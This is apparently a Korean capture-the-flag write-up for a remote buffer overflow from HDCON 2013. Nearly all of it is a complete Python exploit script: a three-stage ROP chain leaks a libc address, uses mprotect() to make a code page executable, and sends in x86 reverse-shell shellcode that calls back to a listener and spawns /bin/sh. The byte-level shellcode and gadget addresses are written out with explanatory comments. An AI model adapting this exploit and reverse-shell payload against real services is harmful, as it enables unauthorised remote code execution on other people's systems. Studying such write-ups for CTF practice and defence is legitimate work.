2013.06.17 17:30

HDCON REMOTE BOF 


Hacked by singi , exploiting & report by 광운



hdconNo5_exp.py

luckyzzang



공격 페이로드는 아래와 같다.


STAGE1 = SEND + PPPPR + SOCKFD + GOT_TIME + VALUE_0x4 + NULL + \
          (send() takes four arguments, so a pop;pop;pop;pop;ret gadget is needed here — the code below uses PPPPR, not PPPR)

              FUNC + AAAA + SOCKFD


STAGE2 = MPROTECT + PPPR + PAGE_BASE (0x08048000, the page that holds CUSTOM_STACK) + SIZEOF_PAGE (0x1000) + MODE_RWX (7) +\

               RECV + RETURN_CUSTOM + SOCKFD + CUSTOM_STACK + SHELLCODELEN + NULL


STAGE3 = SHELLCODE (sent as a third write; the stage-2 chain recv()s it straight into the page just made executable)



from socket import *

import sys

import struct


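# x86 Linux reverse-shell shellcode.  Decoded from the bytes below:
#   socket(AF_INET, SOCK_STREAM, 0); dup2(fd, 2/1/0);
#   connect(fd, {AF_INET, 127.0.0.1 (0x7f000001), port 0x22b8 = 8888});
#   execve("/bin//sh", ...)
# The callback target is hard-coded, so a listener must already be waiting
# on 127.0.0.1:8888 before the exploit is run.
# Written as bytes literals so the payload is byte-identical on Python 2 and 3
# (the original str literals break on 3 when concatenated with struct.pack()).
SHELLCODE = (
    b"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80"      # socket()
    b"\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"                      # dup2() loop
    b"\x68\x7f\x00\x00\x01\x66\x68\x22\xb8\x66\xb9\x02\x00\x66\x51"      # sockaddr_in 127.0.0.1:8888
    b"\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\x31\xdb\x43\x43\x43\xcd\x80"  # connect()
    b"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x52\x89\xe2\x53\x89\xe1\xcd\x80"                                  # execve("/bin//sh")
)

# Length argument handed to recv() by the stage-2 chain.
SHELLCODELEN = struct.pack('<L', len(SHELLCODE))

# Addresses inside the target binary (fixed 0x0804xxxx, i.e. no PIE).
PLT_SEND = 0x08048610    # send@plt: used to write a GOT slot back to us
GOT_TIME = 0x804a004     # GOT entry of time(); leaking it pins the libc mapping
ADDR_FUNC = 0x080486d4   # re-entered after the leak so a second request is read
                         # (presumably the request handler -- TODO confirm in the binary)

# Client socket fd as seen inside the service.  The original payload hard-codes 4;
# this holds only if the service has exactly fds 0-3 open when it accept()s -- verify.
SOCKFD = 4

# Stack-cleanup gadgets: pop;pop;pop;ret and pop;pop;pop;pop;ret, used to
# discard the arguments of the call that precedes them in the chain.
PPPR = struct.pack('<L', 0x804878d)
PPPPR = struct.pack('<L', 0x80489cc)

# Stage 1: fill the 1036-byte buffer, then overwrite the saved return address with
#   send(SOCKFD, GOT_TIME, 4, 0)   -> leaks time()'s libc address back to us
#   PPPPR                          -> pops the four send() arguments
#   ADDR_FUNC(SOCKFD)              -> 'AAAA' is its (never used) return address
STAGE1 = (
    b'\x41' * 1036
    + struct.pack('<L', PLT_SEND)
    + PPPPR
    + struct.pack('<L', SOCKFD)
    + struct.pack('<L', GOT_TIME)
    + struct.pack('<L', 4)        # bytes to leak
    + struct.pack('<L', 0)        # send() flags
    + struct.pack('<L', ADDR_FUNC)
    + b'\x41\x41\x41\x41'         # fake return address for ADDR_FUNC
    + struct.pack('<L', SOCKFD)   # its first argument
)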


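def _recv_exact(sock, n):
    """Read exactly *n* bytes from *sock*.

    recv() may return fewer bytes than requested; the original did
    ``struct.unpack('<L', s.recv(4))`` which raises struct.error on a short
    read.  Raises EOFError if the peer closes the connection first.
    """
    chunks = []
    remaining = n
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise EOFError('connection closed after %d of %d bytes'
                           % (n - remaining, n))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)


if __name__ == '__main__':
    # Stage 1 leaks a libc pointer, stage 2 mprotect()s the binary's text page
    # RWX and recv()s the shellcode into it, stage 3 is the shellcode itself.
    # The shellcode connects back to 127.0.0.1:8888 -- start a listener first.
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(10.0)  # fail loudly instead of hanging if the service dies mid-chain
    s.connect(('127.0.0.1', 7777))
    try:
        s.recv(1024)  # banner / prompt; contents are not needed
        s.send(STAGE1)

        # The stage-1 chain send()s the 4-byte GOT entry of time() back to us.
        ADDR_TIME = struct.unpack('<L', _recv_exact(s, 4))[0]

        # Offsets from time() to mprotect() and recv() in the target's libc.
        # They are specific to that libc build; re-derive them for any other box.
        ADDR_MPROTECT = ADDR_TIME + 0x41B70
        ADDR_RECV = ADDR_TIME + 0x48080

        # Where the shellcode is recv()'d to and then jumped to: an address inside
        # the binary's first text page, made RWX by the mprotect() call below.
        CUSTOM_STACK = 0x08048791

        # Stage 2:
        #   mprotect(0x08048000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)
        #   PPPR                      -> pops the three mprotect() arguments
        #   recv(4, CUSTOM_STACK, len(SHELLCODE), 0)
        #   return into CUSTOM_STACK  -> runs the bytes recv() just wrote
        STAGE2 = (
            b'\x41' * 1036
            + struct.pack('<L', ADDR_MPROTECT)
            + PPPR
            + struct.pack('<L', 0x08048000)    # page containing CUSTOM_STACK
            + struct.pack('<L', 0x1000)        # one page
            + struct.pack('<L', 7)             # PROT_READ|PROT_WRITE|PROT_EXEC
            + struct.pack('<L', ADDR_RECV)
            + struct.pack('<L', CUSTOM_STACK)  # recv()'s return address = the shellcode
            + struct.pack('<L', 4)             # sockfd inside the service (assumed 4)
            + struct.pack('<L', CUSTOM_STACK)  # recv() buffer
            + SHELLCODELEN
            + struct.pack('<L', 0)             # recv() flags
        )

        s.recv(1024)  # response of the re-entered handler; contents are not needed
        s.send(STAGE2)
        # NOTE(review): stage 2 and the shellcode go out back-to-back on one TCP
        # stream.  If the service's read for stage 2 is large enough to absorb
        # both, the ROP recv() gets nothing; a short delay between the two
        # sends would be needed -- confirm against the server's read size.
        s.send(SHELLCODE)
    finally:
        s.close()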



